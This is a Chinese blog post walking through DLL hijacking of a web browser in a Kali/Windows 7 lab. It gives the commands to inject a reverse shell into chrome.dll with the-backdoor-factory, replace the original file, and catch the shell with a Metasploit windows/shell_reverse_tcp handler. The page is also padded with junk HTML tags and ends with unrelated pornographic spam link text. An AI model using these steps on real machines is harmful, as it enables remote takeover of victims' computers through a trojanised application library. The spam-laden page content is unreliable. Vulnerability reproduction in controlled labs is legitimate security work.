<kbd id="afajh"><form id="afajh"></form></kbd>
<strong id="afajh"><dl id="afajh"></dl></strong>
    <del id="afajh"><form id="afajh"></form></del>
        1. <th id="afajh"><progress id="afajh"></progress></th>
          <b id="afajh"><abbr id="afajh"></abbr></b>
          <th id="afajh"><progress id="afajh"></progress></th>

          DLL劫持 漏洞復(fù)現(xiàn)

          共 1279字,需瀏覽 3分鐘

           ·

          2020-12-18 10:36


          DLL(Dynamic Link Library)文件為動態(tài)鏈接庫文件,又稱"應(yīng)用程序拓展",是軟件文件類型。在Windows中,許多應(yīng)用程序并不是一個完整的可執(zhí)行文件,它們被分割成一些相對獨立的動態(tài)鏈接庫,即DLL文件,放置于系統(tǒng)中。當(dāng)我們執(zhí)行某一個程序時,相應(yīng)的DLL文件就會被調(diào)用。一個應(yīng)用程序可使用多個DLL文件,一個DLL文件也可能被不同的應(yīng)用程序使用,這樣的DLL文件被稱為共享DLL文件。


          如果在進程嘗試加載一個DLL時沒有指定DLL的絕對路徑,那么Windows會嘗試去按照順序搜索這些特定目錄時下查找這個DLL,只要黑客能夠?qū)阂獾腄LL放在優(yōu)先于正常DLL所在的目錄,就能夠欺騙系統(tǒng)優(yōu)先加載惡意DLL,來實現(xiàn)"劫持"



          例如:對于文件系統(tǒng),如doc文檔打開會被應(yīng)用程序office打開,而office運行的時候會加載系統(tǒng)的一個dll文件,如果我們將用惡意的dll來替換系統(tǒng)的dll文件,就是將DLL和doc文檔放在一起,運行的時候就會在當(dāng)前目錄中找到DLL,從而優(yōu)先系統(tǒng)目錄下的DLL而被執(zhí)行。


          SRC也收這類DLL劫持漏洞的


          下面是某瀏覽器的DLL劫持


          攻擊機 Kali 192.168.123.182


          靶機? ?Win7 192.168.123.243


          需要用到?procexp64(線程分析工具)


          以及某瀏覽器,哈哈哈 表哥們不要認真哈。



          先找到某瀏覽,然后查看那些DLL文件跟瀏覽器一起啟動的




          將chrome.dll?復(fù)制到 kali 里面


          攻擊機 Kali 執(zhí)行

          git clone https://github.com/secretsquirrel/the-backdoor-factory #下載T-B-F
          pip?install?capstone?#cd到T-B-F目錄安裝capstone庫
          ./backdoor.py -f /root/tbf/the-backdoor-factory/chrome.dll #在tbf里面找到backdoor.py腳本運行



          掃描注入點


          ./backdoor.py -f /root/tbf/the-backdoor-factory/chrome.dll -s


          這里一共掃描出了83個注入點 我們只要隨機選擇一個注入點就好了

          這里選擇注入點輸入注入點前面的數(shù)字回車就可以



          選擇完后會自動生成一個帶shell的dll文件



          進入這個文件夾內(nèi) 反彈shell的dll文件就在這個文件夾內(nèi)





          Chrome.dll文件復(fù)制到過去替換原來文件


          打開msf


          msfconsoleuse?multi/handlerset payload windows/shell_reverse_tcpset?LPORT?4444set LHOST 192.168.123.182exploit






          運行






          可以看到成功上線。



          瀏覽 28
          點贊
          評論
          收藏
          分享

          手機掃一掃分享

          分享
          舉報
          評論
          圖片
          表情
          推薦
          點贊
          評論
          收藏
          分享

          手機掃一掃分享

          分享
          舉報
          <kbd id="afajh"><form id="afajh"></form></kbd>
          <strong id="afajh"><dl id="afajh"></dl></strong>
            <del id="afajh"><form id="afajh"></form></del>
                1. <th id="afajh"><progress id="afajh"></progress></th>
                  <b id="afajh"><abbr id="afajh"></abbr></b>
                  <th id="afajh"><progress id="afajh"></progress></th>
                  夜夜看,夜夜爽 | 老外玩csgo中国的妹子视频 | 女人18毛片AAA片水真多 女人18片毛片90分钟免费 | 国产女人18水真多18精品一级做 | 鸡巴马上放进去免费视频网站 |